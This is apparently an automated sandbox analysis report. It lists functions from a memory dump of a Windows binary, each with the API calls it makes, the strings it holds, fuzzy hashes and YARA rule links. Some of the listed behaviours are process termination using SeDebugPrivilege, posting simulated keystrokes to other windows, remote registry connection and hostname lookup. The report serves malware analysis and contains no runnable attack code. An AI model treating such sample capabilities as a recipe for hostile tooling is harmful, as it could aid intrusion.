Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 3814da7bd23b1e9ae39b14f2d9287cb0d7aa3f66e30847dc421528e838389bcc
Instruction ID: f605132ffca722d031ffbda2aa7247e05130c80e57da780812856376f8f16fc7
Opcode Fuzzy Hash: 3814da7bd23b1e9ae39b14f2d9287cb0d7aa3f66e30847dc421528e838389bcc
Instruction Fuzzy Hash: 4B112C7B248356BAFA026721EC1BDF777ACDB51370B208017F514A50D1FE536981C664

Uniqueness

Uniqueness Score: -1.00%

Function 00A488B4, Relevance: 13.7, APIs: 9, Instructions: 170COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A4896E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: d7e5ef30582ed2220607e2967174ec0e49610c57c8cbbd55f43d2b5dc8590e08
Instruction ID: 8b1049b655c9e9ec62912e405da08186625cb667c50a735ae2573d91b83c63de
Opcode Fuzzy Hash: d7e5ef30582ed2220607e2967174ec0e49610c57c8cbbd55f43d2b5dc8590e08
Instruction Fuzzy Hash: 6B51D638A00204BFEF20DF64EC85FAD7BA4FB85390F604126F515E61A1CFB9A980DB51

Uniqueness

Uniqueness Score: -1.00%

Function 009C2B72, Relevance: 13.7, APIs: 9, Instructions: 165windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 009FC547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009FC569
LoadImageW.USER32 ref: 009FC581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009FC59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009FC5C0
DestroyIcon.USER32(00000000), ref: 009FC5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009FC5EC
DestroyIcon.USER32(?), ref: 009FC5FB

Part of subcall function 00A4A71E: DeleteObject.GDI32(00000000), ref: 00A4A757

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: e7c60ac1e8f546a43b830581729d5c2c11492b3f643739b8a1f9958b8e0d060e
Instruction ID: f833f93a4f5feaeb40aa10b10c8c95c394a2658c58325b1c3838bcb0e9fe9e28
Opcode Fuzzy Hash: e7c60ac1e8f546a43b830581729d5c2c11492b3f643739b8a1f9958b8e0d060e
Instruction Fuzzy Hash: A051AA74A00209AFEB24DF64DC45FBA7BB8EB45360F10452CF946A72A0DB70ED81DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A34458, Relevance: 13.6, APIs: 9, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00A3447F
EmptyClipboard.USER32 ref: 00A34485
GlobalAlloc.KERNEL32(00000002,?), ref: 00A3449A
CloseClipboard.USER32 ref: 00A34539

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 84e0a94a48f10012e6b8e1e8f772249cd1133cd5ab4519c4fadda93accdbb484
Instruction ID: d53ec46311c4869adbad89db6113c0208adee35a23bad682e0884fd21d603cf5
Opcode Fuzzy Hash: 84e0a94a48f10012e6b8e1e8f772249cd1133cd5ab4519c4fadda93accdbb484
Instruction Fuzzy Hash: DB21A339600610DFDB10DFA4EC09F6AB7A8EF89711F11802AF94ADB261DB71AC01CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00A19B50, Relevance: 13.6, APIs: 9, Instructions: 68sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1AE57: GetWindowThreadProcessId.USER32(00000005,00000000), ref: 00A1AE77
Part of subcall function 00A1AE57: GetCurrentThreadId.KERNEL32 ref: 00A1AE7E
Part of subcall function 00A1AE57: AttachThreadInput.USER32(00000000,?,00A19B65,?,00000001,?,?,?,?,?,00A43940,00000001), ref: 00A1AE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 00A19B70
PostMessageW.USER32 ref: 00A19B8D
Sleep.KERNEL32(00000000,?,?,?,00A43940,00000001), ref: 00A19B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 00A19B99
PostMessageW.USER32 ref: 00A19BB7
Sleep.KERNEL32(00000000,?,?,?,00A43940,00000001), ref: 00A19BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 00A19BC3
PostMessageW.USER32 ref: 00A19BDA
Sleep.KERNEL32(00000000,?,?,?,00A43940,00000001), ref: 00A19BDD

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: a3c17a958946e13025aab6bea4a3e981c3ba44311605ab9a290df1326d327a25
Instruction ID: 9b23da89fda14c4a9d3d813a3d253ab809dcb8b730c4494dddaad64f8a5579e9
Opcode Fuzzy Hash: a3c17a958946e13025aab6bea4a3e981c3ba44311605ab9a290df1326d327a25
Instruction Fuzzy Hash: 22112579540518BEF6006BA0EC49FAB3F2DDB8D795F111425F304AB0E0C9F31C51DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A18E03, Relevance: 13.6, APIs: 9, Instructions: 50memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00A18A84,00000B00,?,?,?,00000000,00000001,?,?,?,00000001), ref: 00A18E0C
HeapAlloc.KERNEL32(00000000,?,00A18A84,00000B00,?,?,?,00000000,00000001,?,?,?,00000001), ref: 00A18E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A18A84,00000B00,?,?,?,00000000,00000001,?,?,?,00000001), ref: 00A18E28
GetCurrentProcess.KERNEL32(00A79544,00000000,?,00A18A84,00000B00,?,?,?,00000000,00000001,?,?,?,00000001), ref: 00A18E30
DuplicateHandle.KERNEL32(00000000,?,00A18A84,00000B00,?,?,?,00000000,00000001,?,?,?,00000001), ref: 00A18E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00A18A84,00000B00,?,?,?,00000000,00000001,?,?,?,00000001), ref: 00A18E43
GetCurrentProcess.KERNEL32(?,00000000,?,00A18A84,00000B00,?,?,?,00000000,00000001,?,?,?,00000001), ref: 00A18E4B
DuplicateHandle.KERNEL32(00000000,?,00A18A84,00000B00,?,?,?,00000000,00000001,?,?,?,00000001), ref: 00A18E4E
CreateThread.KERNEL32 ref: 00A18E68

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 848fec905c054799388fa86ef4536a24472c0230bb675232a42b810566de1582
Instruction ID: 8a5a380629da27f638bab5123c3d1984e9918d2a65049c5ccd7cac00ee3c552f
Opcode Fuzzy Hash: 848fec905c054799388fa86ef4536a24472c0230bb675232a42b810566de1582
Instruction Fuzzy Hash: 4901AC79240304FFE610DBB5DC4DF673BACEB8A715F015511FB05DA191C67698018A20

Uniqueness

Uniqueness Score: -1.00%

Function 00A3F9A8, Relevance: 12.4, APIs: 8, Instructions: 399processCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A3FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A3FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A3FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A3FBE2
CreateProcessW.KERNEL32 ref: 00A3FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00A3FD90
CloseHandle.KERNEL32(?), ref: 00A3FDBF
CloseHandle.KERNEL32(?), ref: 00A3FE36

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess
String ID:
API String ID: 2947177986-0
Opcode ID: 010d3d3574933b5c5658bae8427a47aea9d97fe0cf19355daf3fb169cc47ff36
Instruction ID: 1b66c4c72e46ae61217bfb094b9e0e034cea253e00232f6676c32c86e38e9801
Opcode Fuzzy Hash: 010d3d3574933b5c5658bae8427a47aea9d97fe0cf19355daf3fb169cc47ff36
Instruction Fuzzy Hash: EBE1B131A14341DFCB14EF24D895B6ABBE4EF85354F14886EF8998B2A2CB31DC45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A3EC47, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00A23E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00A23EB6
Part of subcall function 00A23E91: Process32FirstW.KERNEL32(00000000,?), ref: 00A23EC4
Part of subcall function 00A23E91: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00A23F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A3ECB8
GetLastError.KERNEL32 ref: 00A3ECCB
OpenProcess.KERNEL32(00000001,00000000,?,?,SeDebugPrivilege), ref: 00A3ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00A3ED77
GetLastError.KERNEL32(00000000), ref: 00A3ED82
CloseHandle.KERNEL32(00000000), ref: 00A3EDB7

Strings

SeDebugPrivilege, xrefs: 00A3ECD6

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: 4b6efd692ccb2d0da47fe5af0dfff7103d2c1449202353dd3c6f98967f1b965b
Instruction ID: cdfbe6a1703ecaf979c8ca1574bb8501316181088c6388904fa9e0bec0d5e659
Opcode Fuzzy Hash: 4b6efd692ccb2d0da47fe5af0dfff7103d2c1449202353dd3c6f98967f1b965b
Instruction Fuzzy Hash: 0E41DC712002019FDB10EF28CD9AF6EB7A0AF80750F08801DF9469F3C2DBB5A845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A23226, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 00A232C5

Strings

warning, xrefs: 00A232AE
question, xrefs: 00A2327E
stop, xrefs: 00A23296
blank, xrefs: 00A23247
info, xrefs: 00A23266

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 652c4e62bbcccb41e554853c4e38e88ff7960c373d31611b88a656dbb5a32599
Instruction ID: 4089272f418520b02b65652bbe38d061f9bf53e31d14100f2f06892e36f2dc0e
Opcode Fuzzy Hash: 652c4e62bbcccb41e554853c4e38e88ff7960c373d31611b88a656dbb5a32599
Instruction Fuzzy Hash: FE11EE3320D3A5FA9B015B55FC42CEFB79CEF76760F204439F50456182D6692F4047A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A248F3, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00A2490E
gethostname.WSOCK32(?,00000100), ref: 00A24928
gethostbyname.WSOCK32(?), ref: 00A24935
inet_ntoa.WSOCK32(?), ref: 00A2497B
_strcat.LIBCMT ref: 00A24989
WSACleanup.WSOCK32 ref: 00A249AE

Strings

0.0.0.0, xrefs: 00A24957

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: c04155139a0e821e22a4de2cd414133498b34d9e6ccb2ab84ecfc6a7da66df34
Instruction ID: 08396eea4aba8dae4e2065d4e98e9538b33861dbe9909f20400bdf8b1628b8d3
Opcode Fuzzy Hash: c04155139a0e821e22a4de2cd414133498b34d9e6ccb2ab84ecfc6a7da66df34
Instruction Fuzzy Hash: 2411E73A904124BFDB21EB64FD0AEEF37BCEB85720F000576F04495051EF755AC286A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A27C1A, Relevance: 12.3, APIs: 8, Instructions: 300COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00A27CF6

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 1bf5b31f697ba7947f0b4664d8497d71b517e45cdc2dfe982dc7211e85011d62
Instruction ID: a47034469a592754de41312db6c3b97dbb79fca6978aaa133691ffd038a38628
Opcode Fuzzy Hash: 1bf5b31f697ba7947f0b4664d8497d71b517e45cdc2dfe982dc7211e85011d62
Instruction Fuzzy Hash: 2EB1E17690822A9FDB10DFA8E984BBEB7F4FF45320F214079E510E7241D734AA41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D74C, Relevance: 12.3, APIs: 8, Instructions: 262windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009C2612: GetWindowLongW.USER32 ref: 009C2623

GetSystemMetrics.USER32 ref: 00A4D78A
GetSystemMetrics.USER32 ref: 00A4D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00A4D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A4DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A4DA24
ShowWindow.USER32(00000003,00000000), ref: 00A4DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 00A4DA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 00A4DA8B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: e53561948dfe48187f474bddf47a2ffc1b1740ee0956db67bb442d61e05393fb
Instruction ID: c589adbf3e044334ecfba333926e2ac43fdbc3bb72b497372ab093042b70fdcd
Opcode Fuzzy Hash: e53561948dfe48187f474bddf47a2ffc1b1740ee0956db67bb442d61e05393fb
Instruction Fuzzy Hash: E8B19879600225EFDF14CF68C985BBD7BB1FF84701F18807AEC489A696D735A990CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FF9C, Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A40038,?,?), ref: 00A410BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A40079

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 6d049bbf2e8170c620a2453ff0289a278701888c1f034491549926c453b85fd9
Instruction ID: df16a904fc598140b88b1c2e169fb7328a1f8f762f6ef20f882cbf19454a9ec3
Opcode Fuzzy Hash: 6d049bbf2e8170c620a2453ff0289a278701888c1f034491549926c453b85fd9
Instruction Fuzzy Hash: 9BA188346042019FCB10EF58C895F6EB7E5AFC4314F18881DFA969B2A2DB71E945DF82

Uniqueness

Uniqueness Score: -1.00%

Function 009C2A5B, Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,009FC417,00000004,00000000,00000000,00000000), ref: 009C2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,009FC417,00000004,00000000,00000000,00000000,000000FF), ref: 009C2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,009FC417,00000004,00000000,00000000,00000000), ref: 009FC46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,009FC417,00000004,00000000,00000000,00000000), ref: 009FC4D6

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: b9ee1ad1476705bd0c98fa6fde305f3c21ecd85edf06bad31f1e8b700ab104ba
Instruction ID: f708886231944ffa7975487fc56c539a34a32bd27b485d59c1f558e406a63bca
Opcode Fuzzy Hash: b9ee1ad1476705bd0c98fa6fde305f3c21ecd85edf06bad31f1e8b700ab104ba
Instruction Fuzzy Hash: 54416D35A082849ED739CB68DD9CF7B3B59AF86310F14CC1DE147865F1C6799842C722

Uniqueness

Uniqueness Score: -1.00%

Function 00A24189, Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,0000000E), ref: 00A241D4
LoadResource.KERNEL32(?,00000000), ref: 00A241E0
LockResource.KERNEL32(00000000), ref: 00A241ED
FindResourceW.KERNEL32(?,?,00000003), ref: 00A2420D
LoadResource.KERNEL32(?,00000000), ref: 00A2421F
SizeofResource.KERNEL32(?,00000000), ref: 00A2422E
LockResource.KERNEL32(?), ref: 00A2423A
CreateIconFromResourceEx.USER32 ref: 00A2429B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLock$CreateFromIconSizeof
String ID:
API String ID: 2263570339-0
Opcode ID: 36dd4ce513d399842ec15c7089bc689067f5509f68a1a4565daf51b71f08edb5
Instruction ID: f5f45af6f1512dc5e4618922b1bf605dd1534b2c94041e4748a86618348f269d
Opcode Fuzzy Hash: 36dd4ce513d399842ec15c7089bc689067f5509f68a1a4565daf51b71f08edb5
Instruction Fuzzy Hash: 25318F79A0522AAFDB11DFA5EC48AFF7BACEF49301F004535F905D2150D770D9628BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A46442, Relevance: 12.1, APIs: 8, Instructions: 99windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00A4645A
GetDC.USER32 ref: 00A46462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A4646D
ReleaseDC.USER32 ref: 00A46479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00A464B5
SendMessageW.USER32(00000001,00000030,00000000,00000001), ref: 00A464C6
MoveWindow.USER32(00000001,?,?,?,?,00000000,?,?,00A49299,?,?,000000FF,00000000,?,000000FF,?), ref: 00A46500
SendMessageW.USER32(00000001,00000142,00000000,00000000), ref: 00A46520

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 32048b90cf57bc7473f542ef8a0272a89af3b0bc60657d4b25e49e5d0ebdab6e
Instruction ID: 8cac24399a977ef55fc9a5177fcea89f1fedb488257273f7730253f0c0f45865
Opcode Fuzzy Hash: 32048b90cf57bc7473f542ef8a0272a89af3b0bc60657d4b25e49e5d0ebdab6e
Instruction Fuzzy Hash: 47316D7A201150BFEB208F50DC49FAB3F69EB8A765F054065FE089A191C7769842CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00A39E38, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 367COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00A39EB9, 00A3A1DD
Not an Object type, xrefs: 00A39E90

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 644111954a3a42d609004c53304c6f6234d9faedeb48d5a2f1f3cf3b80b86715
Instruction ID: ea69606a61932639862121fb9055fcb26901a77d513c854ac59ca0017c86e290
Opcode Fuzzy Hash: 644111954a3a42d609004c53304c6f6234d9faedeb48d5a2f1f3cf3b80b86715
Instruction Fuzzy Hash: E5D1BF71A00219AFDF14CFA8DC85EAEB7B9FB58314F108529F945E7280E770AD45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A39428, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 270COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A3954D
VariantInit.OLEAUT32(?), ref: 00A3964E
VariantClear.OLEAUT32(?), ref: 00A39658
VariantClear.OLEAUT32(?), ref: 00A396B5

Strings

Null Object assignment in FOR..IN loop, xrefs: 00A394DD, 00A3960B, 00A396C3
Incorrect Object type in FOR..IN loop, xrefs: 00A39631

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: bb2ff64fed6aeb5472f5dad7af00842e86a7208bcea29bbcf7747c917ca2c1a7
Instruction ID: 8050242ae5b7c9887ddaf604312c7a43409fb07207a1a61468a1dde3648a8250
Opcode Fuzzy Hash: bb2ff64fed6aeb5472f5dad7af00842e86a7208bcea29bbcf7747c917ca2c1a7
